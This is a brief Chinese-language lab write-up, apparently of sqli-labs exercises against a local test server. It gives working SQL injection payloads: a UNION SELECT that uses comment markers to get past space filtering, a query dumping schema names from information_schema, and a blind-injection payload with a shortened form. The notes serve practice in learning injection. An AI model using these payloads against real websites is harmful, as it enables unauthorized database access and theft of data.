這道題發現頁面中會顯示出GET過去的參數
不過好像沒有URL解碼...
好奇怪 , 感覺好像是傳過去之后又被編碼了 , 還沒有看源碼 , 暫時不能確定
這樣的話 , 說明執行的SQL語句就是URL編碼以后的 , 這樣肯定是不行的
用Burp抓包重放試試
后記 :
URL編碼過濾了空格等等特殊字符 , 可以通過這樣驗證存在注入點
http://127.0.0.1/Less-29/?id=0'union/**/select/**/1,1,1/**/--+
http://127.0.0.1/Less-29/?id=0%27union/**/select/**/1,group_concat(schema_name),1/**/from/**/information_schema.schemata--+
這樣就可以dump數據了
后記 :
還是可以利用前面的Payload通殺盲注
http://127.0.0.1/Less-28a/?id=0%27%20or()or%20%27%27=%271
后來發現這個Payload還可以簡化
在mysql中也有弱類型機制 , '0' 和 '1' 可以分別表示假和真
簡化后 :
?id=0'||()||'0